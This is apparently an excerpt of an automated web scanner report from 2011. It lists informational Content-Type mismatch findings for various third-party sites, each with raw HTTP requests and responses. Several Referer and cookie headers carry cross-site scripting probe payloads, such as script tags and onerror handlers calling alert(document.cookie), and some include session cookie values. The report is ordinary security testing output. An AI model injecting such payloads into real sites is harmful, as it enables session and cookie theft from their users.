authorship is retained. I accept no responsibility for loss or
...[SNIP]...

32.42. http://mako.cc/projects/aub/docs/Introducing_AUB previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mako.cc
Path:	/projects/aub/docs/Introducing_AUB

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /projects/aub/docs/Introducing_AUB HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.43. http://mako.cc/projects/aub/docs/USAGE previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mako.cc
Path:	/projects/aub/docs/USAGE

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /projects/aub/docs/USAGE HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:34 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64481-a30-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 2608
Connection: close
Content-Type: text/plain

Command line options:

   aub -c        Catch up on all groups, but do not assemble binaries
   aub -n        No checkpointing; don't update aubrc
   aub -dN        Set debugging level to N (N > 0)
   aub -M        Print the aub
...[SNIP]...

32.44. https://maps-api-ssl.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://maps-api-ssl.google.com
Path:	/maps/api/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.45. http://maps.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.google.com
Path:	/maps/api/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Mon, 24 Jan 2011 22:41:44 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

32.46. http://newsguy.com/user_info.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://newsguy.com
Path:	/user_info.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

32.47. http://people.joomla.org/components/com_community/assets/group_thumb.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://people.joomla.org
Path:	/components/com_community/assets/group_thumb.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /components/com_community/assets/group_thumb.png HTTP/1.1
Host: people.joomla.org
Proxy-Connection: keep-alive
Referer: http://people.joomla.org/groups/viewdiscussion/996-Joomla%C3%82%C2%AE%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295967274.1.1.utmcsr=joomlacode.org|utmccn=(referral)|utmcmd=referral|utmcct=/gf/project/joomla/reporting/; __utma=11952431.110894349.1295967274.1295967274.1295967274.1; __utmc=11952431; __utmb=11952431.2.10.1295967274; 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:10:20 GMT
Server: Apache
Last-Modified: Wed, 10 Nov 2010 07:17:07 GMT
ETag: "29e8007-124d-494ada51962c0"
Accept-Ranges: bytes
Content-Length: 4685
Content-Type: image/png

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................@.@..
...[SNIP]...

32.48. http://people.joomla.org/plugins/system/cdscriptegrator/libraries/highslide/graphics/zoomout.cur previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://people.joomla.org
Path:	/plugins/system/cdscriptegrator/libraries/highslide/graphics/zoomout.cur

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /plugins/system/cdscriptegrator/libraries/highslide/graphics/zoomout.cur HTTP/1.1
Host: people.joomla.org
Proxy-Connection: keep-alive
Referer: http://people.joomla.org/groups/viewdiscussion/996-Joomla%C3%82%C2%AE%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295967274.1.1.utmcsr=joomlacode.org|utmccn=(referral)|utmcmd=referral|utmcct=/gf/project/joomla/reporting/; 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d; __utma=11952431.110894349.1295967274.1295967274.1295967274.1; __utmc=11952431; __utmb=11952431.3.10.1295967274; __utmz=173056674.1295968217.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/68; __utma=173056674.779126497.1295968217.1295968217.1295968217.1; __utmc=173056674; __utmb=173056674.1.10.1295968217

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:10:24 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 01:38:08 GMT
ETag: "1988330-146-4906a9d5ea000"
Accept-Ranges: bytes
Content-Length: 326
Content-Type: text/plain

...... ......0.......(... ...@.............................................................................................p............... ...@.............7...$ ..$ ..7.............................
...[SNIP]...

32.49. http://people.joomla.org/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://people.joomla.org
Path:	/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js HTTP/1.1
Host: people.joomla.org
Proxy-Connection: keep-alive
Referer: http://people.joomla.org/groups/viewdiscussion/996-Joomla%C3%82%C2%AE%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295967274.1.1.utmcsr=joomlacode.org|utmccn=(referral)|utmcmd=referral|utmcct=/gf/project/joomla/reporting/; __utma=11952431.110894349.1295967274.1295967274.1295967274.1; __utmc=11952431; __utmb=11952431.2.10.1295967274; 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:10:03 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 01:38:08 GMT
ETag: "198833a-14-4906a9d5ea000"
Accept-Ranges: bytes
Content-Length: 20
Content-Type: application/javascript

jQuery.noConflict();

32.50. http://ping.crowdscience.com/ping.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ping.crowdscience.com
Path:	/ping.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

Response

32.51. http://r.nexac.com/e/getdata.xgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /e/getdata.xgi HTTP/1.1
Host: r.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y;

Response

32.52. http://rt.disqus.com/forums/realtime-cached.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.disqus.com
Path:	/forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js HTTP/1.1
Host: rt.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 22:49:11 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

32.53. https://secure.disqus.com/embed/login.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://secure.disqus.com
Path:	/embed/login.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /embed/login.html HTTP/1.1
Host: secure.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 BAD REQUEST
Server: nginx
Date: Mon, 24 Jan 2011 22:49:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie,Accept-Encoding
Content-Length: 19

Missing parameters.

32.54. http://spongecell.com/api/events/915725/buy_tickets previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://spongecell.com
Path:	/api/events/915725/buy_tickets

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/events/915725/buy_tickets HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.55. http://spongecell.com/flash/download/264001/ad.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://spongecell.com
Path:	/flash/download/264001/ad.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-shockwave-flash

The response states that it contains a flash object. However, it actually appears to contain plain text.

Request

GET /flash/download/264001/ad.swf HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:24 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 8
Last-Modified: Fri, 21 Jan 2011 17:13:35 GMT
Connection: close
Accept-Ranges: bytes

disabled

32.56. http://static.fmpub.net/site/tweetmeme previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://static.fmpub.net
Path:	/site/tweetmeme

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /site/tweetmeme HTTP/1.1
Host: static.fmpub.net
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Last-Modified: Fri, 07 Jan 2011 04:27:54 GMT
Accept-Ranges: bytes
X-Server: static1.chi.fmpub.net
Keep-Alive: timeout=120, max=734
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Mon, 24 Jan 2011 22:20:54 GMT
Age: 2346
Content-Length: 3802

var pairs = window.location.search.substr(1).split('&');
for (var i = 0; i < pairs.length; i++) {
var pair = pairs[i].split("=");
if (pair[0] == 'federated_media_section') {
var federated_medi
...[SNIP]...

32.57. http://static.fmpub.net/zone/2671 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://static.fmpub.net
Path:	/zone/2671

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /zone/2671 HTTP/1.1
Host: static.fmpub.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Last-Modified: Mon, 24 Jan 2011 05:10:36 GMT
Accept-Ranges: bytes
X-Server: static3.chi.fmpub.net
Keep-Alive: timeout=120, max=994
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Mon, 24 Jan 2011 22:20:54 GMT
Age: 4613
Content-Length: 4819

var pairs = window.location.search.substr(1).split('&');
for (var i = 0; i < pairs.length; i++) {
var pair = pairs[i].split("=");
if (pair[0] == 'federated_media_section') {
var federated_medi
...[SNIP]...

32.58. http://static.fmpub.net/zone/2673 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://static.fmpub.net
Path:	/zone/2673

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /zone/2673 HTTP/1.1
Host: static.fmpub.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Last-Modified: Mon, 24 Jan 2011 05:10:37 GMT
Accept-Ranges: bytes
X-Server: static2.chi.fmpub.net
Keep-Alive: timeout=120, max=879
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Mon, 24 Jan 2011 22:20:54 GMT
Age: 4172
Content-Length: 4819

var pairs = window.location.search.substr(1).split('&');
for (var i = 0; i < pairs.length; i++) {
var pair = pairs[i].split("=");
if (pair[0] == 'federated_media_section') {
var federated_medi
...[SNIP]...

32.59. http://tweetmeme.s3.amazonaws.com/channel_thumbs/27.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tweetmeme.s3.amazonaws.com
Path:	/channel_thumbs/27.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /channel_thumbs/27.jpg HTTP/1.1
Host: tweetmeme.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: /rtg1AsDE1i/NmC0+CM0RKDAx7DFxblxhyXPOrhO1FB+5h/DMOpVcHMH7OqZQGU7
x-amz-request-id: ED6DE26DD317A690
Date: Mon, 24 Jan 2011 22:20:55 GMT
x-amz-meta-s3fox-filesize: 4461
x-amz-meta-s3fox-modifiedtime: 1255599239000
Last-Modified: Thu, 15 Oct 2009 09:35:23 GMT
ETag: "4e727bc898344515c2d3954519a628f7"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 4461
Server: AmazonS3

GIF87ap.R.......L.L.....LtR ....R.............?.$D..\.X...,Fl.,..........T..i..$b........R,.........h.[...... :,YS<.Z................G.....9.................a..T.G......tuy..........g...............i
...[SNIP]...

32.60. http://urls.api.twitter.com/1/urls/count.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://urls.api.twitter.com
Path:	/1/urls/count.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Mon, 24 Jan 2011 23:10:24 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

32.61. http://users.tpg.com.au/j_birch/plugins/superfish/changelog.txt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://users.tpg.com.au
Path:	/j_birch/plugins/superfish/changelog.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /j_birch/plugins/superfish/changelog.txt HTTP/1.1
Host: users.tpg.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:10:37 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Sat, 26 Jul 2008 21:30:42 GMT
ETag: "fda65-1461-936480"
Accept-Ranges: bytes
Content-Length: 5217
Cache-Control: max-age=86400
Expires: Tue, 25 Jan 2011 23:10:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Changelog for Superfish - a jQuery menu plugin

v1.2.1: altered 2nd July 07. added hide() before animate to make work for jQuery 1.1.3.

v1.2.2: altered 2nd August 07. changed over function .find(
...[SNIP]...

32.62. http://venedet.michnica.net/media/system/js/mootools-more.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://venedet.michnica.net
Path:	/media/system/js/mootools-more.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

32.63. http://venedet.michnica.net/templates/beez_20/fonts/TitilliumMaps29L002.otf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://venedet.michnica.net
Path:	/templates/beez_20/fonts/TitilliumMaps29L002.otf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/beez_20/fonts/TitilliumMaps29L002.otf HTTP/1.1
Host: venedet.michnica.net
Proxy-Connection: keep-alive
Referer: http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e3231f45f59c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa5a1b42d3949309610b52593e36fa6f=5bee479ce7f93991cea282d14030843c

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:09:35 GMT
Server: Apache
Vary: Host
Last-Modified: Tue, 11 Jan 2011 21:22:09 GMT
ETag: "ce007e-bb70-49998ad55c240"
Accept-Ranges: bytes
Content-Length: 47984
Content-Type: text/plain

OTTO.......0CFF /<....B|..m.GPOS.......p....GSUB;.R....@....OS/2..f.... ...`cmap ..p..;.....head..+u.......6hhea...........$hmtx..b....4....maxp..P.........name..R.......:.post......B\... .........0?:
...[SNIP]...

32.64. http://wildspark.com/asher/ija/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wildspark.com
Path:	/asher/ija/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /asher/ija/ HTTP/1.1
Host: wildspark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.65. http://www.abbreviations.com/images/goog.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.abbreviations.com
Path:	/images/goog.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/goog.jpg HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/jpeg
Last-Modified: Mon, 13 Oct 2008 04:03:16 GMT
Accept-Ranges: bytes
ETag: "a01ac19ee82cc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 21:08:31 GMT
Content-Length: 960

GIF89a..........X._....81.../w...H;k......LM[......'....oj.sf...u.v........yY...........8.?.j]-.;...n...|.....M...W.......}..........gLf|.r{.....=%........~Tp.w..Jv...........v`y..~..........y..0..;.
...[SNIP]...

32.66. http://www.abbreviations.com/images/t.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.abbreviations.com
Path:	/images/t.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/t.gif HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/gif
Last-Modified: Tue, 18 Jan 2011 14:55:23 GMT
Accept-Ranges: bytes
ETag: "a0c2ecbb1fb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 21:08:32 GMT
Content-Length: 297

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%...B....LH.>...b.(..7..Gb\.....4....!..`.`.....!.'....|.T.$~..... ..Pg...7.y.....P..@...3.y.$.....$E ...d.B.@t
...[SNIP]...

32.67. http://www.adobe.com/xml/schemas/PolicyFile.xsd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/xml/schemas/PolicyFile.xsd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain XML.

Request

GET /xml/schemas/PolicyFile.xsd HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:09 GMT
Server: Apache
Last-Modified: Fri, 23 Jan 2009 06:51:42 GMT
ETag: "194f-d24dbb80"
Accept-Ranges: bytes
Content-Length: 6479
Cache-Control: max-age=21600
Expires: Tue, 25 Jan 2011 20:04:09 GMT
Connection: close
Content-Type: text/plain

<?xml version="1.0"?>




<!-- Generic version for all policy files; see more
...[SNIP]...

32.68. http://www.apache.org/licenses/LICENSE-2.0 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.apache.org
Path:	/licenses/LICENSE-2.0

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /licenses/LICENSE-2.0 HTTP/1.1
Host: www.apache.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:07:00 GMT
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0a
Content-Location: LICENSE-2.0.txt
Vary: negotiate,accept
TCN: choice
Last-Modified: Mon, 01 Nov 2010 19:49:36 GMT
ETag: "d23b5d-2c5e-494031b9e1400;49a8819beb140"
Accept-Ranges: bytes
Content-Length: 11358
Cache-Control: max-age=3600
Expires: Tue, 25 Jan 2011 15:07:00 GMT
Connection: close
Content-Type: text/plain

Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/

TERMS AND CONDITIONS FOR USE, REPRODUC
...[SNIP]...

32.69. http://www.autobytel.com/syndication/act_newsletter_submit.cfm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autobytel.com
Path:	/syndication/act_newsletter_submit.cfm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /syndication/act_newsletter_submit.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

